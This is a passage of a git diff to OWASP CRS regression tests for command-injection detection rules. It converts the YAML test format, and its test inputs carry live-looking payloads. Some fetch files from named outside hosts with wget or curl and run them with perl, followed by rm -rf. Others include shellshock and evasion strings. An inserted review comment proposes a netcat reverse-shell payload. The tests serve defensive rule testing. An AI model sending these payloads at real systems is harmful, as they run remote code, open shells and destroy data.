- output: - log_contains: id "932210" - - test_title: 932210-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=;\\n.databases" + version: HTTP/1.0 + output: + log_contains: id "932210" + - test_id: 5 desc: "Fix N9FKP2XQ: .sh whoami" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/juiceshop?s=1;.sh+whoami" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/juiceshop?s=1;.sh+whoami" + version: HTTP/1.0 + output: + log_contains: id "932210" + - test_id: 6 desc: "N9FKP2XQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - code=1;.\"shell whoami - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932210" - - test_title: 932210-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + code=1;.\"shell whoami + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "932210" + - test_id: 7 desc: "N9FKP2XQ" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - code=1;.\'shell whoami - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932210" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + code=1;.\'shell whoami + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "932210" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml index c0a81d84e..22fea813a 100644 
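Review bot: In test_id 1 through 4 the `uri` is a double-quoted YAML scalar containing `\\n`, which the parser resolves to the two characters backslash and `n`, not a newline, whereas the `desc` strings written with a single `\n` do contain a real newline; the description therefore promises a newline-separated `.shell`/`.system`/`.databases` dot-command while the request actually sends a literal `\n`. These cases likely pass only because the leading `;` already satisfies the separator, so the newline path the desc advertises is not exercised. A newline in the request line must be sent percent-encoded, e.g. `uri: "/get?foo=;%0A.shell%20nc%2010.10.10.1%206666%20-e%20sh%0A"`, and the desc should describe whichever form is actually sent.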
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml 
@@ -2,255 +2,240 @@ meta: author: "Max Leske, Xhoenix, azurit" description: Unix shell RCE using pipe for less than 4 chars - enabled: true - name: 932220.yaml +rule_id: 932220 tests: - - test_title: 932220-1 + - test_id: 1 desc: "TEST=echo | php7.4" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "TEST=echo | php7.4" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "TEST=echo | php7.4" + version: HTTP/1.0 + output: + log_contains: id "932220" + - test_id: 2 desc: "TEST=echo | ${php7.4}php7.4" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "TEST=echo | ${php7.4}php7.4" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "TEST=echo | ${php7.4}php7.4" + version: HTTP/1.0 + output: + log_contains: id "932220" + - test_id: 3 desc: "whxami|sh+``" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - 
User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "whxami|sh+``" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "whxami|sh+``" + version: HTTP/1.0 + output: + log_contains: id "932220" + - test_id: 4 desc: "whxami|fish+``" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "whxami|fish+``" - version: HTTP/1.0 - output: - log_contains: id "932220" - - test_title: 932220-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "whxami|fish+``" + version: HTTP/1.0 + output: + log_contains: id "932220" + - test_id: 5 desc: "Negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "echo | curx" - version: HTTP/1.0 - output: - no_log_contains: id "932220" - - test_title: 932220-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "echo | curx" + version: HTTP/1.0 + output: + 
no_log_contains: id "932220" + - test_id: 6 desc: | Test for BB finding 9P5LL13Y echo "foo;whxam"i | tr x o | sh #" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - uri: "/post" - port: 80 - data: | - echo "foo;whxam"i | tr x o | sh #" - version: HTTP/1.1 - output: - log_contains: id "932220" - - test_title: 932220-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + uri: "/post" + port: 80 + data: | + echo "foo;whxam"i | tr x o | sh #" + version: HTTP/1.1 + output: + log_contains: id "932220" + - test_id: 7 desc: "Block evasion using here string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cat<<, Franziska Bühler, Felipe Zipitria, Max Leske, Esad Cetiner, Xhoenix, azurit" - description: "Old tests and tests for fix of 932230 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886. \nIf you need to trigger tests on a command, use one of the three letter commands in the file included by the 932230 data rule.\n" - enabled: true - name: 932230.yaml + description: | + Old tests and tests for fix of 932230 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886. 
+ If you need to trigger tests on a command, use one of the three letter commands in the file included by the 932230 data rule. tests: - - test_title: 932230-1 + - test_id: 1 desc: System Command Injection (932230) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 2 desc: System Command Injection (932230) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - 
Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" + version: HTTP/1.1 + output: + no_log_contains: id 
"932230" + - test_id: 3 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+true+positive+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+true+positive+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 4 desc: Like 932230-3 but instead of space sign using new line sign stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: 
"arg=Something+%26%238222%3BThe+Title%26%238221%3B.%0D%0AThis+is+the+new+line.+After+it+more+characters%0D%0AAnd+the+3rd+line+goes+here" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.%0D%0AThis+is+the+new+line.+After+it+more+characters%0D%0AAnd+the+3rd+line+goes+here" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 5 desc: Another html entity - decimal 9977 (person with ball) with space sign after entity and dot stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Another+entity+and+the+dot+after+it+and+space+%26%239977%3B.+and+more." - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Another+entity+and+the+dot+after+it+and+space+%26%239977%3B.+and+more." 
+ version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 6 desc: Another html entity - decimal 128 (euro) with new line sign after entity and dot stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Euro+entity+%26%238364%3B.%0D%0Aand+the+new+line+after+entity+and+dot" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Euro+entity+%26%238364%3B.%0D%0Aand+the+new+line+after+entity+and+dot" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 7 desc: arg value of ";ifconfig Something „The Title”. 
After space or new line more characters" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 8 desc: arg value of "Something „The Title”. 
After ;ifconfig something" is blocked stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 9 desc: Positive test - RCE passed in one of the args stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: | - 
arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: | + arg1=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=system('dig%20cd%20/tmp;ftp%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;zip%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;tex%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;cut%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 10 desc: RCE from test 932230.yaml combined with html entities in the middle stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: 
"arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;Something+%26%238222%3BThe+Title%26%238221%3B.+After+something;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 11 desc: RCE from test 932230.yaml combined with html entities at the beginning stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: 
"arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 12 desc: RCE from test 932230.yaml combined with html entities at the end stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: 
"arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" - version: HTTP/1.1 - output: - no_log_contains: id "932230" - - test_title: 932230-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something" + version: HTTP/1.1 + output: + no_log_contains: id "932230" + - test_id: 13 desc: RCE from https://github.com/payloadbox/command-injection-payload-list and html entities stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something&arg2=()+{+:;};+/bin/sh+-c+\"sleep+6+&&+echo+vulnerable+6\"" - version: HTTP/1.1 - output: - 